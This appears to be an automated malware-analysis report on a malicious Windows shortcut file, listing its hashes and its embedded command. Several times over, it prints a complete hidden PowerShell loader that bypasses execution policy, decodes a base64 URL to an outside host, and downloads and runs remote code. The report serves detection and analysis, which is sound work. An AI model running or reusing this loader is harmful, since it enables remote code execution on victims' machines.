|
Hash | Hash Value |
|---|---|
| MD5 | 36f7f4d6eb585a5d5eff759287f6b8d7
|
| Sha1 | 0e27b805ea2912c6e619e16a429820d5014b7500
|
| Sha256 | b2d37a411be06457caf2304ba93bc85e447082acbbc8c82f6d171e7911045751
|
| Sha384 | 803e91d48217f399fe2577e69194e19852e1f53216de94edc6b39c9efd2d9f230c87c906c1275edf74beaf156cd4f341
|
| Sha512 | 46ecaf5ca8610abbb66049c94b1ed2155af6ff0c380ec24484a3fe107b3f34139032ab5f36344f79cbf58037054ffeca94d2c77abdf8577b3f44114572793c77
|
| SSDeep | 48:8W9mf74zJSvZtJbkT/kO+xADSPodLXuHH3j3nul9:8qN47Yg/xADDuTul
|
| TLSH | D841E1052BE80715E2F34F3155BBAF56A57BBC1AEB25AE1E0082124948B2A10DC25F7B
|
|
Name0 | Value |
|---|---|
| LNK: Command Execution | cmd.exe /c powershell.exe -w h -ep bypass -nop -Command "$a='aHR0cHM6Ly9sYXRlbmN5eC5weXRob25hbnl3aGVyZS5jb20vZG93bmxvYWQvMDVhZWRiMDVhOWYxNDdkYmE4MjNlMTk4YjJhYzc5ZGIudHh0';$b=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($a));$c=New-Object Net.WebClient;iex $c.DownloadString($b)" |
| Deobfuscated PowerShell | powershell.exe -w "h" -ep "bypass" -nop -Command "$a='aHR0cHM6Ly9sYXRlbmN5eC5weXRob25hbnl3aGVyZS5jb20vZG93bmxvYWQvMDVhZWRiMDVhOWYxNDdkYmE4MjNlMTk4YjJhYzc5ZGIudHh0';$b=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($a));$c=New-Object Net.WebClient;iex $c.DownloadString($b)" |
| Deobfuscated PowerShell | powershell.exe -w "h" -ep "bypass" -nop -Command "$a='aHR0cHM6Ly9sYXRlbmN5eC5weXRob25hbnl3aGVyZS5jb20vZG93bmxvYWQvMDVhZWRiMDVhOWYxNDdkYmE4MjNlMTk4YjJhYzc5ZGIudHh0';$b=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($a));$c=New-Object Net.WebClient;iex $c.DownloadString($b)" |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | cmd.exe /c powershell.exe -w h -ep bypass -nop -Command "$a='aHR0cHM6Ly9sYXRlbmN5eC5weXRob25hbnl3aGVyZS5jb20vZG93bmxvYWQvMDVhZWRiMDVhOWYxNDdkYmE4MjNlMTk4YjJhYzc5ZGIudHh0';$b=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($a));$c=New-Object Net.WebClient;iex $c.DownloadString($b)" Malicious |
36f7f4d6eb585a5d5eff759287f6b8d7 |
| Deobfuscated PowerShell | powershell.exe -w "h" -ep "bypass" -nop -Command "$a='aHR0cHM6Ly9sYXRlbmN5eC5weXRob25hbnl3aGVyZS5jb20vZG93bmxvYWQvMDVhZWRiMDVhOWYxNDdkYmE4MjNlMTk4YjJhYzc5ZGIudHh0';$b=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($a));$c=New-Object Net.WebClient;iex $c.DownloadString($b)" Malicious |
36f7f4d6eb585a5d5eff759287f6b8d7 > LNK CommandLine |
| Deobfuscated PowerShell | powershell.exe -w "h" -ep "bypass" -nop -Command "$a='aHR0cHM6Ly9sYXRlbmN5eC5weXRob25hbnl3aGVyZS5jb20vZG93bmxvYWQvMDVhZWRiMDVhOWYxNDdkYmE4MjNlMTk4YjJhYzc5ZGIudHh0';$b=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($a));$c=New-Object Net.WebClient;iex $c.DownloadString($b)" Malicious |
36f7f4d6eb585a5d5eff759287f6b8d7 > LNK CommandLine > [Deobfuscated PS] |